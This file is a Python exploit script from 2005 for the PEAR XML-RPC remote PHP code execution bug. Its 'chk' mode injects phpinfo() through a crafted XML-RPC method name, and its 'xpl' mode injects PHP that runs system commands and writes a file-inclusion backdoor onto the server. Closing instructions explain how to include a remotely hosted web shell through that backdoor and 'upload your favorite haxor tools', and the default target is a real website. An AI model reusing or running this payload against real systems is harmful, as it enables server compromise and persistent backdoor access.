xmlrpc.py.txt

`#!/usr/bin/python  
  
# ./xmlrpc.py [chk|xpl] host uri  
# example (check bug): ./xmlrpc.py chk www.postnuke.com /xmlrpc.php  
# example (exploit bug): ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php  
# Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit -- Not working for me  
# so i made this python code  
# http://pear.php.net/bugs/bug.php?id=4692  
# Bug #4692 Remote Code Exection In XML RPC Server  
# xmlrpc.pl http://pathtoxmlrpc/server  
# "id;pwd;uname -a;uptime"  
# [*] Sending command id;pwd;uname -a;uptime  
# [*] Command sent, waiting for response  
# uid=33(www-data) gid=33(www-data) groups=33(www-data)  
# /var/www/drupal  
# Linux cacophony 2.4.18-bf2.4 Apr 14 09:53:28 CEST 2002 i686 GNU/Linux  
# 23:27:22 up 5 days, 9:05, 0 users, load average: 0.12, 0.16, 0.21  
# http://www.postnuke.com/xmlrpc.php  
# by k3rn3lp4nic. greetz: albanian security clan!!! july 2005  
  
  
import sys, httplib  
  
try:  
chose = sys.argv[1]  
except IndexError:  
chose = 'chk'  
  
try:  
host = sys.argv[2]  
except IndexError:  
host = 'www.postnuke.com'  
  
try:  
uri = sys.argv[3]  
except IndexError:  
uri = '/xmlrpc.php'  
  
  
def check():  
SoapMessage = """<?xml version="1.0"?>  
<methodCall>  
<methodName>test.method</methodName>  
<params>  
<param>  
<value><name>','')); phpinfo(); exit;/*</name></value>  
</param>  
</params>  
</methodCall>  
"""  
  
webservice = httplib.HTTP("%s" % host)  
webservice.putrequest("POST", "%s" % uri)  
webservice.putheader("Host", "%s" % host)  
webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke k3rn37p4nic")  
webservice.putheader("Content-type", "application/xml")  
webservice.putheader("Content-length", "%d" % len(SoapMessage))  
webservice.endheaders()  
webservice.send(SoapMessage)  
  
# get the response  
  
statuscode, statusmessage, header = webservice.getreply()  
print "Response: ", statuscode, statusmessage  
print "headers: ", header  
res = webservice.getfile().read()  
print res  
print 'If you see phpinfo dump data the you are succeful. proceed with xpl!'  
  
def xpl():  
  
SoapMessage = """<?xml version="1.0"?>  
<methodCall>  
<methodName>test.method</methodName>  
<params>  
<param>  
<value><name>',''));  
echo 'start';  
passthru('del xmlrpcpy.php');  
$filename = 'xmlrpcpy.php';  
$somecontent = '%?php include(~inc); ?#';  
$somecontent = eregi_replace('%', chr(60), $somecontent);  
$somecontent = eregi_replace('~', chr(36), $somecontent);  
$somecontent = eregi_replace('#', chr(62), $somecontent);  
$handle = fopen($filename,'w');  
fwrite($handle, $somecontent);  
fclose($handle);  
  
passthru('dir');  
  
passthru('type xmlrpcpy.php');  
  
  
echo 'done';  
exit;  
/*</name></value>  
</param>  
</params>  
</methodCall>  
"""  
  
webservice = httplib.HTTP("%s" % host)  
webservice.putrequest("POST", "%s" % uri)  
webservice.putheader("Host", "%s" % host)  
webservice.putheader("User-Agent", "xmlrpc exploit R/1.1 postnuke k3rn37p4nic")  
webservice.putheader("Content-type", "application/xml")  
webservice.putheader("Content-length", "%d" % len(SoapMessage))  
webservice.endheaders()  
webservice.send(SoapMessage)  
  
# get the response  
  
statuscode, statusmessage, header = webservice.getreply()  
print "Response: ", statuscode, statusmessage  
print "headers: ", header  
res = webservice.getfile().read()  
print res  
print '\n\nExploit Successful!!!\nDownload http://www.suneworld.com/programs/webexplorer20.zip'  
print 'Rename index.php3 to index.txt and put it to some public host http://somehost.com/index.txt'  
print 'Now Accessed it like this: '  
print 'http://victimhost/postnukewhatever/xmlrpcpy.php?inc=http://somehost.com/index.txt'  
print 'Then upload your favorite haxor tools! Bye. Stay healthy!'  
  
if __name__ == "__main__":  
print 'xmlrpc exploit R/1.1 4 postnuke by k3rn37p4nic'  
print 'revised it if you can! ver jul 2005'  
print 'Greetz: Albanian Security Clan!!!'  
print '---------------------------------------------'  
print './xmlrpc.py [chk|xpl] host uri'  
print 'example (check bug): ./xmlrpc.py chk www.postnuke.com /xmlrpc.php'  
print 'example (exploit bug): ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php'  
if chose=='chk':  
check()  
elif chose=='xpl':  
xpl();  
else:  
print 'Boom! Script Kiddie'  
  
`